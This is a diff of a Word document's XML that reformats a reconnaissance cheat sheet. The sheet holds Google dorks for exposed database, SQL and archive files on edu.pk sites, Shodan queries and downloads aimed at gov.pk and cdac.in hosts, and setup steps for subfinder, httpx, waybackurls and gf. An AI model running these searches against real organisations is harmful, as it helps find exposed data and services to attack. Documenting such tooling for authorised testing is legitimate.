+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>site:edu.pk filetype:db</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>site:edu.pk filetype:txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>site:edu.pk filetype:xlsx</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>site:edu.pk filetype:sql</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>site:edu.pk filetype:zip</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>site:edu.pk filetype:tar</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -10250,20 +6907,13 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>org:cdac</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>http.title:"Jenkins</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">" </w:t>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">http.title:"Jenkins" </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10282,25 +6932,19 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>product:apache</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
+    </w:p>
+    <w:p>
       <w:r>
         <w:t>country:cn</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
+    </w:p>
+    <w:p>
       <w:r>
         <w:t>city:pune</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:r>
@@ -10349,107 +6993,42 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">1) install </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>shodan</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> cli:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"># pip3 install </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>shodan</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">2) INIT </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>shodan</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>api</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> key:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"># </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>shodan</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>init</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> &lt;API_KEY&gt;</w:t>
+        <w:t>1) install shodan cli:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t># pip3 install shodan</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>2) INIT shodan api key:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t># shodan init &lt;API_KEY&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10474,23 +7053,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"># </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>shodan</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> info</w:t>
+        <w:t># shodan info</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10551,33 +7114,8 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"># </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>shodan</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> count </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>hostname:cdac.in</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t># shodan count hostname:cdac.in</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -10602,59 +7140,13 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"># </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>shodan</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> download --limit 10 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>gov_pk</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>hostname:gov.pk</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Search query:                   </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>hostname:gov.pk</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t># shodan download --limit 10 gov_pk hostname:gov.pk</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Search query:                   hostname:gov.pk</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -10702,88 +7194,51 @@
       <w:r>
         <w:t>.</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>gz</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> FILE IN BEUTFULL WAY </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>beuty.bash</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> FILE IN BEUTFULL WAY beuty.bash </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> |</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>++</w:t>
+      </w:r>
+      <w:r>
+        <w:t>+</w:t>
+      </w:r>
+      <w:r>
+        <w:t>++++++++++++++++++++++++++++++++++</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>| SEE .gz file in GUI beutyGUI.html</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">                   |</w:t>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> |</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>++</w:t>
-      </w:r>
-      <w:r>
-        <w:t>+</w:t>
-      </w:r>
-      <w:r>
-        <w:t>++++++++++++++++++++++++++++++++++</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>| SEE .</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>gz</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> file in GUI beutyGUI.html</w:t>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">| Required .gz file to </w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">json format  </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">                   |</w:t>
       </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">| </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Required .</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>gz</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> file to </w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>json</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> format</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">  </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">                   |</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -10792,23 +7247,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>| Required .</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>gz</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> file to </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>json</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> format for GUI         |</w:t>
+        <w:t>| Required .gz file to json format for GUI         |</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10848,14 +7287,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>```````````</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>`````</w:t>
+        <w:t>````````````````</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10885,86 +7317,22 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve">$ </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>wget</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> https://go.dev/dl/go1.26.4.linux-amd64.tar.gz</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">$ </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> tar -C /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>usr</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>/local -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>xzf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> go1.26.</w:t>
+        <w:t>$ wget https://go.dev/dl/go1.26.4.linux-amd64.tar.gz</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>$ sudo tar -C /usr/local -xzf go1.26.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -11024,73 +7392,23 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve">$ </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> vim ~/.</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>zshrc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">$ </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> vim ~/.</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>bashrc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>$ sudo vim ~/.zshrc</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>$ sudo vim ~/.bashrc</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -11124,23 +7442,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>export GOROOT=/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>usr</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>/local/go</w:t>
+        <w:t>export GOROOT=/usr/local/go</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11190,17 +7492,8 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>$ source ~/.</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>zshrc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>$ source ~/.zshrc</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -11220,15 +7513,7 @@
     <w:p>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">go version go1.26.4 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>linux</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/amd64</w:t>
+        <w:t>go version go1.26.4 linux/amd64</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11279,147 +7564,17 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve">$ </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> mv /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>usr</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>/bin/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>httpx</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>usr</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>/bin/_</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>httpx</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>$ go install -v github.com/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>projectdiscovery</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>httpx</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>cmd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>httpx@latest</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>$ sudo mv /usr/bin/httpx /usr/bin/_httpx</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>$ go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -11518,23 +7673,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve">$ </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>subfinder</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -d target.</w:t>
+        <w:t>$ subfinder -d target.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -11578,54 +7717,22 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve">$ </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>subfinder</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -dL l1.txt -all -recursive -silent | tee -a subs.txt</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">$ cat subs.txt | sort -u | </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>httpx</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -silent | tee alive.txt</w:t>
+        <w:t>$ subfinder -dL l1.txt -all -recursive -silent | tee -a subs.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>$ cat subs.txt | sort -u | httpx -silent | tee alive.txt</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11682,64 +7789,147 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>$ go install github.com/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>tomnomnom</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
+        <w:t>$ go install github.com/tomnomnom/waybackurls@latest</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>$ cat alive.txt | waybackurls | tee wayback.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>--------------------------------------------------------------------------------------------------------------------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>GF-PATTERNS:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>````````````````````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>$ go install github.com/tomnomnom/gf@latest</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>$ echo 'source $GOPATH/pkg/mod/github.com/tomnomnom/gf@v0.0.0-20200618134122-dcd4c361f9f5/gf-completion.bash' &gt;&gt; ~/.zshrc</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>$ mkdir .gf</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>$ cp -r $GOPATH/pkg/mod/github.com/tomnomnom/gf@v0.0.0-20200618134122-dcd4c361f9f5/examples ~/.gf</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
